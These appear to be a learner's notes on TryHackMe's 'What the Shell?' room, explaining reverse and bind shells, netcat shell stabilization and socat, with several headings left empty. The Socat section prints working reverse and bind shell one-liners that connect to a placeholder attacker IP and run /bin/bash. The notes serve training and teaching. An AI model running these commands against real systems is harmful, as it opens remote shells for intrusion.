TryHackMe: Complete Beginner

author: Nathan Acks
date: 2021-10-27

What the Shell?

What Is a Shell?

Terminology:

Tools

Typical tools for creating reverse shells or connecting to bind shells:

Useful sites:

Also check out /usr/share/webshells on Kali Linux.

Types of Shells

Example reverse shell:

Example bind shell:

These are almost, but not quite, mirror images of each other.

Most initial reverse shells (in particular web shells) are non-interactive.

Netcat

While binding to well-known ports requires the use of sudo, it’s also less likely to get flagged/blocked by intermediate firewalls.

Netcat Shell Stabilization

One thing that causes a reverse shell to be non-interactive is when its running in a shell itself. It’s generally possible to stabilize these and get a fully interactive shell on UNIX-like systems:

Note that the stty command can be canceled using reset (after closing the reverse shell). Since echo is turned off, typing this won’t be visible. Trust the force!

You can mostly bypass the need for the stty command by using rlwrap, which sets all of this up for you (though it doesn’t redirect control sequences, so Ctrl+C will still kill the connection).

It’s also possible to upgrade to a socat-powered shell, assuming that you have a statically-compiled version of socat. Typically, the way that you’d transfer this binary is by first spinning up a simply webserver in the directory with your socat binary on the attack machine, and then downloading that binary to the vicitim.

NOTE that in none of these cases will the reverse shell pick up on your terminal size, so you’ll need to manually specify it using stty rows and stty cols.

Socat

Socat: Just an anything-to-anything connector!

# Reverse shell (attacker)
#
nc -lnp $LISTENER_PORT
socat TCP-LISTEN:$LISTENER_PORT -

# Reverse shell (target)
#
nc $ATTACKER_IP $LISTENER_PORT -e /bin/bash
socat TCP:$ATTACKER_IP:$LISTENER_PORT EXEC:"/bin/bash -li"

# Bind shell (attacker)
#
nc $TARGET_IP $LISTENER_PORT
socat TCP:$TARGET_IP:$LISTENER_PORT

# Bind shell (target)
#
nc -lnp $LISTENER_PORT -e /bin/bash
socat TCP-LISTEN:$LISTENER_PORT EXEC:"/bin/bash -li"

This gets us an interactive login shell right out the gate, though we’re still vulnerable to Ctrl+C. Note that when binding to PowerShell, use powershell.exe,pipes in order to force PowerShell to use UNIX-style STDIN/STDOUT.

We can use socat to create an auto-stabilized reverse shell on UNIX-like systems (though we will still need to use stty to set rows/columns).

# Attacker: Connect $LISTENER_PORT to the current TTY,
# send raw keycodes, and turn off terminal echo.
# Basically the `stty raw -echo`.
#
socat TCP-LISTEN:$LISTENER_PORT FILE:`tty`,raw,echo=0

# Target: Connect the listener on the attacker to an
# interactive login bash shell.
#
#     pty    - allocate a PTTY
#     stderr - redirect STDERR to the attacker
#     sigint - pass signals (Ctrl+C) through
#     setsid - use a new session
#     sane   - use a variety of tweaks to "normalize" the
#              terminal's environment
#
socat TCP:$ATTACKER_IP:$LISTENER_PORT \
	EXEC:"/bin/bash -li",pty,stderr,sigint,setsid,sane

NOTE that it’s perfectly acceptable to kick off a socat process from inside a netcat process!